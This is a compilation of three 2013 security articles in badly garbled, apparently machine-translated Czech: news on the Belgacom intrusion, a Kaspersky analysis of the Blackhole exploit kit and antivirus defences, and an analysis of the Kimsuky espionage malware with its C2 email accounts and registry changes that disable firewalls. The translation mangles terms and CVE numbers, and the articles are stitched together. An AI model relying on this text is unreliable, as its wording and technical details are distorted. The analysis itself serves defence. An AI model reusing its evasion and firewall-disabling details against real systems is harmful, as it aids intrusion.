"Při důkladném zkoumání stop digitálního vniknutí, jsme objevili neznámý virus v počtu jednotek v našich interních IT systému. Za účelem odstranění tohoto viru efektivně, jsme se rozhodli vyčistit celý systém," oni rozdělili, a dodal, že operace byla dobře připravena a byla provedena efektivně. Udělali určitě zdůraznit, že neexistuje žádný náznak jakéhokoli dopadu na zákazníky a jejich dat a poskytování svých telekomunikačních služeb nebyla ohrožena v žádném bodě. " Virus se pouze byla zjištěna v rámci vnitřního počítačového systému společnosti Belgacom, ne v telekomunikační síti, "řekli, a poté, co všechny instance ní byly odstraněny, byly zaměstnanci společnosti vyzváni ke změně svého hesla. Společnost se podílela že Belgický federální prokurátor vyšetřuje vniknutí, a oni nemají komentoval pravděpodobných útočníků. Belgický premiér Elio Di Rupo nabídl formální prohlášení říká, že cílem není intrusion byla sabotáž ale jejich vybírání ze "strategických informací." Řekl také, že technologie používaná k útoku naznačuje, že jiné zemi by mohl být za ním. "Pokud je tato hypotéza je potvrzena, a to je opravdu kybernetické špionáže, vláda důrazně odsuzuje tuto vniknutí a porušení integrity veřejné společnosti," řekl uvedl a dodal, že pokud se to ukáže být pravda, budou mít "vhodná opatření". Na tiskové konferenci, jak Belgacom generální ředitel Didier Bellens a Jean-Pascal Labille, belgický ministr veřejných podniků a rozvojovou spolupráci, se odmítl vyjádřit k, který cizí zemi může být za útokem a řekl, že nevěděl, jak dlouho TELECOMU systémy byly ohroženy. Podle nizozemského novinky místě NRC a jejich "dobře informovaných zdrojů", kompromis se datuje do roku 2011, a složitost malware naznačuje, že britská a americká inteligence je pravděpodobné, že viníci. "Hackeři jsou zájem o služby společnosti Belgacom International Carrier (BICS), podpora služeb, které přináší provoz mezi telekomunikačními společnostmi. BIC, společného podniku s Swisscom a MTN Jihoafrické telekomunikační společnosti, je globálním hráčem a jedním z největších poskytovatelů služeb v Africe a na Středním východ, "vysvětlil novinářům s tím, že útočníci se podařilo proniknout do infrastruktury v BICS a byli schopni přistupovat k telefonní a datové přenosy ze zemí, jako je Sýrie a Jemenu.


Blackhole
15.9.2013 Zdroj : Kaspersky Hacking | Nástroje
Exploit Pack.
V černé díry.
Exploit batohu úvodní stránku.
Exploit pro CVE-2012 - 5076.
Exploit pro CVE-2012 až 0507.
Exploit pro CVE-2013 - 0422.
Three-in-one.
Ochrana před zneužitím Java.
První fáze: blok přesměrování na cílovou stránku.
Druhá fáze: detekce modulem souborů antiviru.
Třetí fáze: podpis založený na detekci exploitů.
Fáze čtyři: proaktivní detekce využije.
Pátá fáze: detekce staženého malware (payload).
Závěr.
Dnes se využívá zranitelnosti v odůvodněných programů je jedním z nejpopulárnějších způsobů infikování počítačů. Podle našich údajů se uživatel stroje nejčastěji napadl pomocí exploitů pro Oracle Java zranitelnosti. Dnešní bezpečnostní řešení, jsou však schopny účinně odolávat drive-by útoky provedené pomocí exploitu balení. V tomto článku budeme diskutovat o tom, jak může být počítač napaden pomocí blackhole exploit kit a příslušné ochranné mechanismy, které mohou být použity.

Exploit Pack.
Zpravidla namísto použití jediného exploit, útočníci využívají ready-made sady známé jako exploit balení. To jim pomáhá výrazně zvýšit efektivitu "pronikání", protože každý útok může využít jednu nebo více využije pro softwarové zranitelnosti přítomných na počítači, že budou napadeni.

Zatímco v minulých činů a škodlivými programy stažené s jejich pomocí na počítači oběti byly vytvořeny stejnými lidmi, dnes tento segment na černém trhu pracuje na SaaS (Software as a Service) model. V důsledku dělby práce, každá skupina zločinců se specializuje ve své vlastní oblasti: některé vytvářet a prodávat Exploit Pack, jiné lákají uživatelům využívat počáteční stránky (řídit provoz), ještě jiní psát malware, který je distribuován pomocí drive-by útoky. Dnes, všichni cybercriminal chtějí nakazit běžných strojích, řekněme, varianta Trojan Zeus musí udělat, je koupit ready-made exploitu pack nastavit a získat co nejvíce potenciální oběti jak je to možné navštívit úvodní stránku (také tzv. landing page).

Útočníci používají několik metod k přesměrování uživatele na exploit smečky vstupní stránce. Nejnebezpečnější je pro uživatele hackerské stránky legitimních webových stránek a injekčních skripty nebo iframe prvky do jejich kódu. V takových případech, to je dost pro uživatele k návštěvě známé stránky pro drive-by útok bude zahájen a na exploit balení začít pracovat tajně. Počítačoví zločinci použít také legitimní reklamní systémy, spojovat bannery a oříšky na škodlivé stránky. Další metodou, která je populární mezi zločinci šíří odkazy na odkazované stránky ve spamu.


Infikování uživatelských stroje pomocí exploit balení: přehled diagram

Tam jsou četné Exploit balení na trhu k dispozici: Jaderná Pack, Styx Pack, BlackHole, Sakura a další. I přes různá jména, všechny práce těchto "řešení" stejným způsobem: každý exploit balíček obsahuje řadu hrdinských plus správce panel. Kromě toho, je provoz všech balení lze využít, na základě toho, co je v podstatě stejný algoritmus.

Jeden z nejznámějších Exploit balení na trhu se nazývá BlackHole. Obsahuje zneužití chyby zabezpečení v aplikaci Adobe Reader, Adobe Flash Player a Oracle Java. Pro maximální účinek se využívá zahrnuty v balení neustále měnit. Na začátku roku 2013 jsme se zabývali třemi využije pro Oracle Java z Blackhole balení, takže jsme zvolili BlackHole pro ilustraci provozní principy exploit balení.

V černé díry.
Je třeba poznamenat, že všechny údaje o hrdinských činech, obsah startovacích stránek a další specifické informace popisované v tomto článku (zejména názvy metod a tříd a hodnoty konstant), byl platný v době, kdy byl výzkum prováděn. Počítačoví zločinci se stále aktivně rozvíjet Blackhole: často upravit kód jednoho exploitu nebo jiný bránit detekci anti-malware řešení. Například, může se změnit dešifrovací algoritmus použitý jeden z využije. V důsledku toho mohou být některé kódu se liší od hodnoty uvedené v následujících příkladech, ale s nimi související principy provozu zůstávají stejné.

Máme-li vytisknout všechny proměnlivé údaje v malém typu písma.

Exploit batohu úvodní stránku.

Exploit batohu Úvodní stránka slouží k určení vstupních parametrů a rozhodování o exploit Pack je další akce. Vstupní parametry zahrnují verzi operačního systému na počítači uživatele, typ prohlížeče a plugin verze, jazyk systému atd. Zpravidla se využije být použity při útoku na systém, jsou vybírány na základě vstupních parametrů. Je-li software vyžaduje Exploit balení není přítomen na cílovém počítači, útok neuskuteční. Dalším důvodem útoku nemůže dojít, je, aby se zabránilo exploit balení, obsah dostaly do rukou odborníků v anti-malware společnosti nebo jiné výzkumníky. Například adresy počítačoví zločinci "černé listiny" může používat IP výzkumné společnosti (roboti, roboti, proxy servery), blokové exploity od spuštění virtuálních počítačů, atd.

Screenshot níže ukazuje vzorek kódu ze vstupní stránky Blackhole Exploit soupravy.


Screenshot kódu Blackhole Exploit z kitu úvodní stránku

I krátký pohled na screenshotu je dostačující vidět, že je kód JavaScript je popletl a většina informací jsou zakódovány.

Návštěva úvodní stránku bude mít za následek provedení kódu, který byl původně šifrována.


Algoritmus pro dešifrování kódu JavaScript, který byl v provozu v lednu 2013:

naplnění proměnné "z1 - Zn" se zašifrovaným datům,
pak tyto proměnné spojovat do jednoho řetězce a dešifrování dat takto: každé dva znaky (znak "-" je ignorován) jsou považovány tvoří 27-ary číslo, které je převeden do desítkové soustavy;
přidat "57" na získané hodnoty a podílet se na výsledku od 5;
převést výsledné číslo zpět na znak pomocí funkce "fromCharCode".
Kód, který provádí tyto operace je označena modrými ovály na obrázku výše. Druhá řada se skládá ze desetinných čísel od 0 do 255, které jsou převedeny na znaky pomocí ASCII tabulky. Oba fragmenty kódu získané přeměnou jsou prováděny pomocí "eval" příkaz (ukáže na screenshotu s červenými šipkami).

Celý algoritmus výše by byly realizovány s několika řádků kódu, ale zločinci používají speciální techniky (označené žlutými ovály na obrázek), aby se detekce složitější:

úmyslně způsobí výjimku s "document.body * = dokumentu" příkaz;
kontrolu styl prvního <div> prvku pomocí příkazu "document.getElementsByTagName (" d "+" iv ") [0] === style.left." "", všimněte si, že prázdné <div> prvek se za tímto účelem do dokumentu (v druhém řádku);
volání ", pokud (123)", což nedává smysl, protože tento výraz je vždy pravda;
rozbíjení názvy funkcí a následně zřetězení částí.
Kromě výše popsaných triků, zločinci využívat mnoho menší změny kódu, které mohou být překážkou signatur detekce. Přestože se náš antivirový program, například, obsahuje skript emulátor a jednoduché změny v konstant a operace nebude mít vliv na účinnost detekce, může výše popsané triky dělat věci těžší emulátoru taky.

Po dešifrování, kód se objeví v paměti RAM - budeme odkazovat na to jako "dešifrovaného skriptu". Skládá se ze dvou částí.

První část je modul založený na volném PluginDetect knihovny, který může být použit k určení verze a schopnosti většiny moderních prohlížečů a jejich zásuvné moduly. Počítačoví zločinci používají různé knihovny, ale tento modul je klíčovým prvkem každé exploit balení. BlackHole používá PluginDetect vybrat vhodné využije pro stažení v závislosti na softwaru nainstalovaného na počítači uživatele. Za "odpovídající" se rozumí takové zneužití, které mají nejvyšší šance na úspěšné spuštění a spuštění škodlivého kódu na konkrétním PC.

Druhá část "dešifrovaného skriptu" je kód odpovědné za zpracování výsledků produkované PluginDetect funkcemi a stahování se využije vybrány a jejich vypouštění.

V březnu 2013 BlackHole používá využije pro následující zranitelnosti:

Java verze od 1,7 do 1.7.х.8 - CVE-2012-5.076;
Java verze 1.6 nebo nižší než 1,6 až 1.6.х.32 - CVE-2012-0.507;
Java verze z 1.7.х.8 do 1.7.х.10 - CVE-2013 až 0422;
Adobe Reader verze pod 8 - CVE-2008-2992;
Adobe Reader verze 8 nebo 9-9,3 - CVE-2010 až 0188;
Adobe Flash verze od 10 do 10.2.158 - CVE-2011 až 0559;
Adobe Flash verze od 10.3.181.0 do 10.3.181.23 a pod 10.3.181 - CVE-2011-2.110.
Níže diskutujeme zneužití chyby zabezpečení Java.

Exploit pro CVE-2012 - 5076.

Technické detaily
Exploit pro CVE-2012 až 0507.

Technické detaily
Exploit pro CVE-2013 - 0422.

Technické detaily
Three-in-one.

Jak bylo uvedeno výše, jsou tři Java využívá v podstatě založen na stejném mechanismu: získají oprávnění a načíst užitečné zatížení, který stáhne a spustí cílový soubor. Tři využije také k témuž Java soubor třídy. To jasně ukazuje, že tatáž osoba nebo tytéž osoby se za vývojem těchto tří využije. Jediný rozdíl je technika používaná k získání neomezené oprávnění k souboru třídy.

Class soubor můžete stáhnout a spustit soubory, dešifrování pomocí parametrů předaných dešifrovaného skriptu. Aby detekce obtížnější, škodlivý stažený soubor je obvykle šifrována, a proto nezačíná hlavičkou PE. Stažený soubor je obvykle dešifrovat paměť pomocí XOR algoritmu.

Předávání parametrů přes dešifrovaného skriptu je pohodlný způsob, jak rychle se mění odkazů na užitečné zatížení: to vše se má změnit údaje o exploit smečky vstupní stránky, aniž byste museli znovu zkompilovat škodlivý Java applet.

Tři chyby diskutoval nahoře jsou tzv. logické nedostatky. Je nemožné kontrolovat využije pro takové zranitelnosti, které budou tyto automatické nástroje, jako ty, které monitorování integrity paměti nebo vytvoření výjimek. To znamená, že takové hrdinské činy nemohou být detekovány v aplikaci Microsoft DEP nebo ALSR technologie nebo jiné obdobné automatické nástroje. Nicméně, tam jsou technologie, které mohou vyrovnat s tím - příkladem je Kaspersky Lab Automatic Exploit Prevention (AEP).

Ochrana před zneužitím Java.
Přes veškerou snahu zločinci, dnešní bezpečnostní řešení účinně blokovat drive-by útoky provedené pomocí exploitu balení. Zpravidla ochrana proti zneužití obsahuje integrovanou sadu technologií, které blokují takové útoky v různých fázích.

Výše, za předpokladu, popis Blackhole exploit kitu operační principy. Nyní si ukážeme, pomocí řešení společnosti Kaspersky Lab jako příklad, jak se ochrana poskytovaná v každé fázi útoku pomocí Java využije z Blackhole. Vzhledem k tomu, i jiným způsobem, lze využít, balení působí, je podobný, který provádí v Blackhole, může ochranná konstrukce se zde hovoří se na ně vztahují, stejně.


Postupné ochranu proti drive-by útok

Níže diskutujeme, které součásti ochrany komunikovat pomocí škodlivého kódu a kdy.

První fáze: blok přesměrování na cílovou stránku.

Útok začíná, jakmile se uživatel dostane ke zneužití batohu vstupní stránku. Je však možné řešení zabezpečení WWW antivirus součást blokovat útok ještě před tím, než začne, tj. předtím, než skript na vstupní stránce je vypuštěn. Tato ochrana ověří součást adresy webové stránky, než je zahájeno. V podstatě je to jednoduchá kontrola dané stránky URL s databází škodlivých odkazů, ale to může blokovat uživatele před návštěvou exploit batohu vstupní stránku, za předpokladu, že jeho adresa je již známo, že patří do nebezpečného zdroje.

Díky tomu je nezbytné, aby dodavatelé antivirových přidat škodlivé odkazy do svých databází, co nejdříve. Škodlivé URL databáze může být umístěn na běžných strojích nebo v oblaku (tj., na vzdáleném serveru). V druhém případě, cloud technologie přispívají k minimalizaci časové prodlevy před bezpečnostní produkt začne blokovat nové škodlivé odkazy. "Doba odezvy" je snížena v tomto případě, protože řešení zabezpečení nainstalována na počítači uživatele dostává informace o nové hrozby, jakmile příslušný záznam je přidán ke škodlivému databáze odkazů, aniž by museli čekat na aktualizace antivirové databáze.

Počítačoví zločinci se na oplátku snaží změnit domén používané hostit využít stránky balení přistání často, aby se zabránilo bezpečnostní software blokování těchto stránek. To v konečném důsledku snižuje ziskovost jejich podnikání.

Druhá fáze: detekce modulem souborů antiviru.

Pokud má uživatel koneckonců dosáhl exploit batohu vstupní stránku, to je místo, kde součástí souboru antivirového modulu - statické detektoru a heuristická analýza - přijde dovnitř skenování exploit batohu vstupní stránku na výskyt škodlivého kódu. Níže budeme analyzovat provozní principy, výhody a nedostatky každého komponentu.

Statická Detektor používá statickou podpisy pro detekci škodlivého kódu. Tyto podpisy jsou spuštěny pouze specifické fragmenty kódu, v podstatě specifické sekvence bajtu. To je hrozba detekční metody, která byla použita v prvních antivirových řešení a jeho výhody jsou dobře známy. Patří mezi ně vysoký výkon a snadné ukládání podpisů. Vše detektor musí udělat, aby se přijít s verdiktem je porovnat kontrolní součet nebo bytového sekvence kódu analyzované příslušných záznamů v databázi antivirového. Podpisy jsou desítky bajtů ve velikosti a snadno nabitý, takže je lze snadno uložit. Nejvýznamnějším nedostatkem statického detektoru je snadnost, s jakou může být podpis "vyhnul". Všechny zločinci musí udělat, aby detektoru zastavit detekční objekt je změnit pouze jeden bajt. Tento nedostatek vede k druhému: velký počet podpisů potřebných k pokrytí velké množství souborů, což znamená, že databáze se rychle zvětšovat.
Heuristická analýza také používá databáze, ale pracuje na zcela jiném principu fungování. To je založeno na analýze objekty: shromažďování a inteligentně analýze dat objektu, určení modelů, atd. V případě, že výpočetní statistiky údaje vznikající v důsledku této analýzy odpovídá heuristické podpis, objekt je detekován jako škodlivý. Hlavní výhodou heuristické podpisu je, že umožňuje řešení pro detekci velký počet podobných objektů, za předpokladu, že rozdíly mezi nimi nejsou příliš velké. Nevýhodou je, že ve srovnání se zpracováním statické podpisy, může heuristický analyzátor je pomalejší a vliv na výkon systému. Například, pokud je heuristický podpis není určen efektivní, tj., jestliže to vyžaduje velký počet operací k plnění jeho kontroly, může ovlivnit výkon systému na stroji, na kterém je spuštěn antivirový řešení.
Aby nedošlo k objektu z odhalení pomocí statické podpis, zločinci třeba, aby minimální změny kódu objektu (skript spustitelný program nebo soubor). Tento proces může být do jisté míry automatizovat.

Chcete-li se vyhnout heuristické detekce malwaru spisovatel potřebuje provádět výzkum s cílem zjistit, jaký mechanismus se používá k detekci objektu. Když algoritmus byl zcela nebo částečně analyzována, musí být změny, které brání heuristické podpis byl opět spuštěn být ke škodlivému kódu objektu.

Je zřejmé, že "vyhýbání se" heuristický podpis nevyhnutelně trvá déle, než zločinci zabránit detekci pomocí statických podpisy. To znamená, že heuristické podpisy mají delší "životnost". Na druhou stranu, po malware autoři upravili objekt se vyhnout heuristickou detekci, to také zabere nějaký čas dodavatele antivirového softwaru vytvořit jiný podpis.

Jak bylo uvedeno výše, anti-malware řešení využívá různé soubory podpisů skenovat vstupní stránku. Ve svém tahu, tvůrci malwaru upravovat objekty na exploitu batohu úvodní stránce, aby se vyhnul podpis založený na detekci obou typů. I když je dostatečně jednoduše rozbít řetězce až do znaků vyhnout statické podpisy, vyhýbání se heuristiky vyžaduje využití jemnější funkce nabízené JavaScript - netradiční funkce, srovnání, logické výrazy, atd. Příkladem tohoto typu mlžení byl poskytnut v První část článku. To je v této fázi, že malware je často zjištěna, a to zejména v důsledku nadměrného kód zmatek v pojmech, které lze považovat za charakteristický rys škodlivé objekty.

Kromě databází uložených na pevném disku počítače, tam jsou podpisy umístěné v cloudu. Tyto podpisy jsou obvykle velmi jednoduché, ale extrémně krátká nové hrozby doba odezvy (až pět minut od vytváření podpisu na zpřístupnění v cloudu), znamená to, že uživatel stroje jsou velmi dobře chráněné.

Třetí fáze: podpis založený na detekci exploitů.

Je-li bezpečnostní řešení nedokáže rozpoznat úvodní stránku exploit balení, druhý přichází do provozu. Kontroluje, které pluginy jsou nainstalovány (Adobe Flash Player, Adobe Reader, Java Oracle, apod.) a rozhodne o tom, který využívá se stáhnou a spustit. Bezpečnostní řešení prohledá každý exploit být stahovaný stejným způsobem, jako tomu bylo exploit batohu vstupní stránku - pomocí souboru antivirový modul a cloudové podpisy. Útočníci ve svém tahu snaží vyhnout detekci pomocí určitých technik, které jsou podobné těm, které je popsáno výše.

Fáze čtyři: proaktivní detekce využije.

Pokud žádná ze složek odpovědných za reaktivní (signatur) ochrana zjistil něco podezřelého při skenování exploit balení, obsah a exploit zahájila, to je místo, kde Proaktivní ochrana moduly jsou dodávány dovnitř sledovat chování aplikací v systému v reálném čas a identifikovat jakýkoli škodlivou činnost.

Každá aplikace je rozdělena na základě informací poskytnutých heuristické analýzy, data z cloudu a dalších kritérií, jako "důvěryhodné", "Low omezeným", "High Restricted" nebo "nedůvěryhodné". Application Control omezuje vždy uvedena činnost na základě své kategorii. Aplikace v důvěryhodných třídě jsou povoleny všechny druhy činností, které jsou v nízké omezené skupině odepřen přístup k těmto zdrojům, jako uložení hesla, programy ve vysoké omezeným kategorii není dovoleno provádět změny v systémových složkách, atd. Všechny aplikací, které jsou zahájena, a všechny ty, provoz jsou analyzovány modul nazvaný Kontrola aplikací na produkty společnosti Kaspersky Lab. Tato komponenta sleduje provádění programu v systému pomocí low-level háčky.

Kromě výše uvedených, tzv. Behavior Stream Signatures (BSS) popisujících škodlivou činnost se používají k detekci nebezpečné chování aplikací. Tyto podpisy jsou vyvíjeny virovou analýzu a následně v porovnání s chováním aktivních aplikací. To umožňuje proaktivní ochranu odhalit nové škodlivé verze, které nebyly zahrnuty v nedůvěryhodné nebo Vysoké omezení kategorií. Je třeba poznamenat, že tento typ detekce je velmi efektivní, protože je založen na analýze údajů o skutečném použití ", aktuální aktivity spíše než statické nebo heuristické analýzy. To skýtá takové techniky jako kód mlžení a šifrování zcela neúčinné, protože v žádném případě vliv na chování škodlivého programu.

Pro přísnější kontrolou aplikace, aby se zabránilo jejich zranitelnost z vykořisťování, používáme technologii s názvem Automatická Exploit Prevention (AEP). Složka AEP sleduje každý proces, jak je spuštěn v systému. Konkrétně se kontroluje zásobník volání anomálií, kontroluje kód, který vysílá každý proces, atd. Kromě toho, že provádí výběrové kontroly dynamických knihoven načíst do procesů.

To vše brání a škodlivé procesy, od svého zrodu v důsledku využívající zranitelnosti. To je ve skutečnosti poslední linii obrany, které poskytují ochranu před zneužitím v případě, že ostatní součásti ochrany selhaly. Pokud aplikace, jako je například Oracle Java nebo Adobe Reader, chová podezřele jako výsledek vykořisťování, bude zranitelný legitimní žádost zablokován anti-malware řešení, brání exploit z udělání škody.

Protože ochrana v této fázi je založen na programu jednání, zločinci mají se používat důmyslné a pracné techniky se vyhnout proaktivní ochranu.

Pátá fáze: detekce staženého malware (payload).

Pokud exploit se zůstat nepovšimnuto, pokusí se stáhnout užitečné zatížení a spusťte jej v počítači uživatele.

Jak jsme psali výše, nebezpečný soubor je obvykle kódována, aby se detekce obtížnější, což znamená, že nezačíná hlavičkou PE. Stažený soubor je obvykle dešifrovat paměť pomocí XOR algoritmu. Potom soubor je buď spuštěn z paměti (obvykle se jedná o dynamické knihovny), nebo spadl na pevný disk a pak spustit z pevného disku.

Trik stahování zašifrovaného souboru PE umožňuje malware oklamat antivirová řešení, protože takové stažení vypadají jako obyčejné datové proudy. Je však nezbytné, aby exploit spustí dešifrovat spustitelný soubor na počítači uživatele. A anti-malware řešení bude v souvislosti s tímto soubor všech různých technologií pro ochranu zmíněných výše.

Závěr.
Exploit Pack jsou integrovaný systém pro útočení napadených počítačů. Počítačoví zločinci věnovat hodně času a úsilí, aby byla zachována účinnost exploit balení a minimalizovat detekci. Ve svém tahu, anti-malware společnosti neustále zlepšovat své bezpečnostní řešení. Anti-malware prodejci mají nyní celou řadu technologií, které mohou blokovat drive-by útoky na všech úrovních, včetně těch, které zneužívání zranitelnosti.


"Kimsuky" Operation: Severokorejský APT?

14.9.2013 Zdroj: Kaspersky Hacking | KyberVálka
Po několik měsíců jsme monitorovali probíhající kybernetické špionáže kampaň proti Jižní Koreje think-tanků. Existuje několik důvodů, proč tato kampaň je výjimečný ve svém provedení a logistiky. Všechno to začalo jednoho dne, když jsme se setkali s poněkud naivní špionážní program, který komunikoval jeho "master" prostřednictvím veřejné e-mailového serveru. Tento přístup je spíše vlastní mnoha amatérských virem spisovatelů a tyto útoky škodlivého softwaru jsou většinou ignorovány.

Nicméně, tam bylo pár věcí, které přitahuje naši pozornost:

Veřejnost e-mailového serveru v pochybnost byla Bulharština - mail.bg .
Kompilace řetězec cesty obsažené korejské hieroglyfy.
Tyto dvě skutečnosti nucen se blíže podívat na tento malware - korejské překladače vedle bulharských e-mailové velení a řízení komunikace.

Kompletní nalezena cesta v malware představuje některé korejské řetězce:

D: \ rsh \ 공격 \ UAC_dll (완성) \ Release \ test.pdb

"Rsh" slovo, podle všeho, znamená zkrácení "Remote Shell" a korejská slova mohou být přeloženy do angličtiny jako "útok" a "doplnění", tj.:

D: \ rsh \ ATTACK \ UAC_dll ( DOKONČENÍ ) \ Release \ test.pdb

Ačkoli úplný seznam obětí zůstává neznámý, se nám podařilo identifikovat několik cílů této kampaně. Podle naší technické analýzy, útočníci měli zájem zaměření těchto organizací. "

Sejong Institute

Sejong Institute je nezisková soukromá organizace pro veřejný zájem a vedoucí think tank v Jižní Koreji, provádí výzkum na strategii národní bezpečnosti, sjednocení strategie, regionální otázky a mezinárodní politické ekonomie.

Korea ústav pro obranu analýz (KIDA)

KIDA je komplexní obranný výzkum institucí, která zahrnuje širokou škálu produktů pro obranné účely záležitostí. KIDA je organizována do sedmi výzkumných center: Centrum pro bezpečnost a strategie, Centrum pro vojenské plánování, Centrum pro rozvoj lidských zdrojů, Centrum pro řízení zdrojů, Centrum pro studia zbraňových systémů; Centrum pro studium informační systém a Centrum pro modelování a simulace. KIDA má také IT Consulting Group a různé podpůrné oddělení. Kida posláním je přispět k racionální obranu politiky prostřednictvím intenzivní a systematické výzkumu a analýzy obranných otázkách.

Ministerstvo sjednocení

Ministerstvo sjednocení je výkonným útvarem Jihokorejská vláda odpovědná za činnost směřující k sjednocení Koreje. Jeho hlavní úkoly jsou: stanovení severokorejskou politiku, koordinaci inter-korejské dialog, sledovat inter-korejské spolupráce a vzdělávání veřejnosti o sjednocení.

Hyundai Merchant Marine

Hyundai Merchant Marine je jihokorejská společnost poskytující logistické služby po celém světě Kontejnerová přeprava.

Některé indicie rovněž naznačují, že počítače, které patří do "příznivců korejské sjednocení" ( http://www.unihope.kr/ ) byly také zaměřeny. Mezi organizacemi se počítá, jsou 11 se sídlem v Jižní Koreji a dvě jednotky jsou umístěny v Číně.

Částečně proto, že tato kampaň je velmi omezený a vysoce cílené, jsme se zatím nepodařilo zjistit, jak je to malware rozděluje. Škodlivého vzorky, které jsme našli, jsou v rané fázi malware nejčastěji dodává kopí phishingové e-maily.

Infikování systému

Počáteční Trojan kapátko je Dynamic Link Library fungující jako zavaděč pro další malware. Nezáleží udržovat vývoz a jednoduše přináší další šifrované knihovny zachována ve své části zdrojů. Tato druhá knihovna plní všechny funkce špionáže.

Při spuštění v systému Windows 7, škodlivý knihovna využívá frameworku Metasploit je open-source kód Win7Elevate na vložení škodlivého kódu do explorer.exe . V každém případě, ať už je to Windows 7 nebo ne, tento škodlivý kód dešifruje jeho špionážní knihovnu ze zdrojů, uloží na disk se zdánlivě náhodně, ale hardcoded jména, například ~ DFE8B437DD7C417A6D.TMP , v uživatelském dočasné složky a načte tento obrázek jako knihovna.

Tato další fáze knihovna kopíruje do System32 adresáře ve složce Windows po hardcoded názvu souboru - buď KBDLV2.DLL nebo AUTO.DLL , v závislosti na malware vzorku. Pak služba je vytvořen pro servisní DLL. Servisní jména také se mohou lišit od verze na verzi, jsme zjistili následující jména - DriverManage, webové služby a WebClientManager . Tyto funkce zajišťují malware vytrvalost narušenou OS mezi restartování systému.

V této fázi, malware shromažďuje informace o infikovaném počítači. To zahrnuje výstup systeminfo příkazu uloženého v souboru oledvbs.inc následováním hardcoded cesta: C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc . Tam je další funkce nazvaná - malware vytvoří řetězec obsahující počítač a uživatelská jména, ale to není používán kdekoliv. Podle všeho se jedná o chybu v malware autorem. Později, přijdeme do funkce, takový řetězec by mohl být relevantní, ale malware není schopen najít tato data v místě, kde by měla být. Tyto kroky jsou přijata pouze v případě, že běží v infikovaném systému poprvé. Na startu systému, škodlivý knihovna provádí špionáž činnosti, které potvrzuje, že je načten obecným svchost.exe procesu.
 

Špehování moduly

Existuje mnoho škodlivých programů zapojených do této kampaně, ale kupodivu, každý z nich implementovat jednu špionážní funkce. Kromě základní knihovny ( KBDLV2.DLL / AUTO.DLL ), která je odpovědná za společnou komunikaci s jeho kampaně pána, byli jsme schopni najít modulů, které vykonávají následující funkce:

Klávesové zkratky protokolování
Výpis adresáře kolekce
HWP dokument krádeži
Dálkový ovladač ke stažení a spuštění
Dálkové ovládání přístupu
Vypnutí brány firewall

Na startu systému, základní knihovna zakáže systému firewall a všechny AhnLab firewallu (Jihokorejská bezpečnostní produkt prodejce) od vynulování související hodnoty registru:

= = 0
HKLM \ SOFTWARE \ AhnLab \ V3IS2007 \ InternetSec FWRunMode = 0
HKLM \ SOFTWARE \ AhnLab \ V3IS80 \ je fwmode = 0
 

To také vypne Centrum zabezpečení systému Windows službu, aby se zabránilo upozorní uživatele o zdravotně postižené firewall.

Není náhodou, že malware autor vybral AhnLab bezpečnostní produkt. Během našeho výzkumu Winnti , jsme se dozvěděli, že jeden z korejských obětí byl ostře kritizován v Jižní Koreji regulátorů pomocí zahraničních bezpečnostních produktů. Nevíme jistě, jak tato kritika ovlivnila další jihokorejské organizace, ale víme, že mnoho organizací, jihokorejský nainstalovat AhnLab bezpečnostní produkty. Proto tyto útočníci ani neobtěžujte se vyhnout výrobky zahraničních dodavatelů ', protože jejich cíle jsou pouze jihokorejská.

Jakmile je malware firewall zakáže AhnLab, zkontroluje, zda je soubor taskmgr.exe je umístěn v hardcoded C: \ WINDOWS \ složky. Pokud je soubor přítomen, spustí tento spustitelný soubor. Dále malware smyčky každých 30 minut, aby se zprávy a čekat na odpověď od operátora.

Komunikace

Komunikace mezi robotem a provozovatel protéká bulharské webové bezplatný e-mailový server ( mail.bg ). Bot udržuje napevno přihlašovací údaje pro jeho e-mailový účet. Po ověření, malware posílá e-maily na jinou přesně stanovenou e-mailovou adresu a čte e-maily z e-mailové schránky. Všechny tyto činnosti jsou prováděny pomocí "mail.bg" webové rozhraní s použitím funkcí systému WinInet API. Ze všech vzorků, které se nám podařilo získat, jsme extrahovali následující e-mailové účty použité v této kampani:

beautifl@mail.bg
ennemyman@mail.bg
fasionman@mail.bg
happylove@mail.bg
lovest000@mail.bg
monneyman@mail.bg
sportsman@mail.bg
veryhappy@mail.bg
Zde jsou dva "master" e-mailové adresy, na které roboty posílat e-maily jménem výše uvedených účtů. Jsou zprávy o stavu a předávat infikované systémové informace prostřednictvím příloh:

iop110112@hotmail.com
rsh1213@hotmail.com
Pravidelné podávání zpráv

Chcete-li ohlásit nákazový status, malware čte z C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc který obsahuje systeminfo výstup příkazu. Pokud soubor existuje, je odstraněna po přečtení.

Pak to čte uživatelsky související informace ze souboru sqlxmlx.inc ve stejné složce (vidíme řetězce odkazující na "UserID" komentáře v této části kódu). Ale tento soubor nebyl nikdy vytvořen. Jak si jistě vzpomínáte, tam je funkce, která by měla tyto údaje shromažďovány a měl chytá do tohoto sqlxmlx.inc souboru. Nicméně, na prvním spuštění se shromažďují informace o uživateli uložené do " xmlrwbin.inc " . To v praxi znamená, že malware spisovatel chybně kódované bot pro uložení informací o uživateli do špatného souboru. Tam je šance na mylném kódu i nadále pracovat - údaje o uživateli mohou být zkopírovány do zasílat informace haldy. Ale ne v tomto případě - v době psaní, shromáždil informace o uživateli proměnné, které by měly směřovat k xmlrwbin.inc souboru dosud nebyla inicializována, což je soubor psát k nezdaru. Vidíme, že sqlxmlx.inc není vytvořena k ukládání uživatelských informací.

Dále jsou zachycené kláves číst ze souboru a poslal na master. Klávesové zkratky jsou zaznamenány a uchovávány v obyčejném a konzistentní podobě v tomto souboru - oba názvy oken, které byly zadány a klíče Skutečné pořadí Vstup z klávesnice. Tato data se nachází v souboru C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc vytvořen externí Key Logger modul.

Všechna tato data jsou sloučeny do jednoho souboru xmlrwbin.inc, který je pak šifrován s RC4. Klíčem RC4 je generován jako MD5 hash náhodně generované 117-bajtů vyrovnávací paměti. Aby bylo možné dešifrovat údajů by útočník určitě vědět buď MD5 hash nebo celý obsah bufferu. Tato data je také odeslána, ale RSA šifrovaný. Malware vytvoří 1120 bit veřejný klíč, používá k šifrování 117-bajtů vyrovnávací paměti. Malware pak spojí všechny údaje, které mají být odeslány jako 128 bajtů bloku. Výsledná data se uloží do C: \ Program Files \ Common Files \ System \ Ole DB \ do souboru s názvem podle následujícího formátu:

"<system Time> _ účtu> na bulharské e server>. Txt", například "08191757_beautifl@mail.bg.txt".

